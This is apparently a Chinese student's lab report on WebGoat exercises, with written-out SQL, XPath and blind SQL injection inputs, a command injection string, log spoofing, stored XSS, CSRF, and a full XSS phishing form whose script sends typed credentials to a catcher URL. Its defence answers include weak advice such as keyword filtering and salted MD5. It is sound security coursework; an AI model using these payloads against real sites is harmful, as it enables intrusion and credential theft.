2017-2018-2 20155225《网络对抗技术》实验九 Web安全基础

WebGoat

1.String SQL Injection

题目是想办法得到数据库所有人的信用卡号，用Smith登录后，得到Smith的两个信用卡号，如图

但如何才能得到所有人的信用卡号呢？

只需要输入' or 1 = ' 1，这样构造可以将引号闭合，再or上一个永真式，就能屏蔽掉前面的条件。

2、Log Spoofing

在User Name中以这种格式注入：Use CR (%0d) and LF (%0a) for a new line。比如输入20155225jzy%0d%0aLogin succeeded !

3、Numeric SQL Injection

这个题目也是要得到数据库全部天气数据，但没有一个可以输入的文本框怎么办呢？

查看页面源代码，在输入下拉框中，向后台提交value值，所以只需在后面加上or 1=1 永真式即可。

登录成功：

4、Command Injection

还是可以用修改页面源码的方法。在后面加上能够在目标主机上执行的命令："& netstat -an & ipconfig"

可见直接改变了下拉框选项，里面出现了我们希望系统执行的命令。

成功：

5、Stage 1:String SQL Injection

开始我们想在密码框输入' or 1=1 --注入，但是失败了。查看网页源码发现，对密码框输入进行了限制。

修改密码限制之后，成功登录：

6、XPATH Injection

这是一个职员私人数据查询系统，我们的目的是看到其他职员的信息。

XPath 是一门在 XML 文档中查找信息的语言。除了在输入1 = 1以外，还需要选择一个XML节点，输入'a' = 'a。

所以只需在User Name输入20155225jzy' or 1=1 or 'a'='a

在Password输入20155225jzy即可成功获得所用员工信息。

7、Blind String SQL Injection

使用盲字符串SQL注入进行爆破，感觉这个好难啊，不太明白逻辑，所以去看了一下答案。

解决方法是通过将一个布尔表达式注入到预脚本SQL查询中来找出名称。

首先是和H比较：101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'H' );返回false并显示无效账号。

变成< 'L' 会返回true，这样我们就知道这个字母是在H和Lz之间。再经过几次查询就能判断出第一个字母是J。

同理，最终可以推出用户名是Jill。

8、Phishing with XSS

用XSS和HTML注入，在搜索框注入下面这段html：

</form>

  <script>

function hack(){

XSSImage=new Image;

XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";

alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " +                         document.phish.pass.value);

}

  </script>

<form name="phish">

<br>

<br>

<HR>

  <H2>This feature requires account login:</H2>

<br>

  <br>Enter Username:<br>

  <input type="text" name="user">

  <br>Enter Password:<br>

  <input type="password" name = "pass">

<br>

  <input type="submit" name="login" value="login" onclick="hack()">

</form>

<br>

<br>

<HR>

然后会看到一个可以输入用户名密码的表单，直接点击登录。WebGoat会将输入的信息捕获并反馈回来，攻击成功。

9、Stored XSS Attacks

这是存储型XSS攻击。在Title里输入学号，在Message里输入<script>alert("20155225 attack succeed!");</script>攻击成功。

10、Cross Site Request Forgery(CSRF)

写一个URL诱使其他用户点击，从而触发CSRF攻击，我们可以以图片的的形式将URL放进Message框，这时的URL对其他用户是不可见的，用户一旦点击图片，就会触发一个CSRF事件。如图：

基础问题回答

1、SQL注入攻击原理，如何防御

SQL注入攻击值得是通过构建特殊的输入作为参数传入web应用程序，而这些输入大都是SQL语法里的一下组合，

通过执行SQL语句进执行攻击者所要的操作，其主要原因是程序没有细致的过滤用户输入的数据，致使非法数据侵入系统。

预防方法：

1、首先要对输入的数据进行过滤，将常见的sql语句的关键词：select or ' " 等字符进行过滤。

2、对在数据库中对密码进行加密，验证登陆的时候先将密码进行加密再与数据库中加密的密码进行对比，若此时一致则基本是安全的。

3、对数据库中密码采用常用的MD5加密时尽量在字符串的前边和后边加上指定字符后在进行加密，这样即便是看到了数据库也很难破解密码。

2、XSS攻击的原理，如何防御

XSS是Cross-site scripting，为了和CSS层叠样式表区分所以取名XSS。是一种网站应用程序的安全漏洞攻击，是代码注入的一种。它允许恶意用户将代码注入到网页上，其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。　　

　　XSS攻击的主要目的则是，想办法获取目标攻击网站的cookie，因为有了cookie相当于有了seesion，有了这些信息就可以在任意能接进互联网的pc登陆该网站，并以其他人的生份登陆，做一些破坏。预防措施，防止下发界面显示html标签，把</>等符号转义

　　

　　预防方法：

　　

　　当恶意代码值被作为某一标签的内容显示：在不需要html输入的地方对html 标签及一些特殊字符( ” < > & 等等 )做过滤，将其转化为不被浏览器解释执行的字符。

当恶意代码被作为某一标签的属性显示，通过用 “将属性截断来开辟新的属性或恶意方法：属性本身存在的单引号和双引号都需要进行转码；对用户输入的html 标签及标签属性做白名单过滤，也可以对一些存在漏洞的标签和属性进行专门过滤。

3、XSRF攻击原理，如何防御

预防方法：

(1).Cookie Hashing(所有表单都包含同一个伪随机值)：

这可能是最简单的解决方案了，因为攻击者不能获得第三方的Cookie(理论上)，所以表单中的数据也就构造失败了:在表单里增加Hash值，以认证这确实是用户发送的请求。然后在服务器端进行Hash值验证

　　(2).验证码

　　这个方案的思路是：每次的用户提交都需要用户在表单中填写一个图片上的随机字符串。

　　(3).One-Time Tokens(不同的表单包含一个不同的伪随机值)

　　

总结

通过这次实验，我了解到web攻击的一些基本内容，也感受到web安全有很广阔的探索空间，希望以后还会有机会继续学习。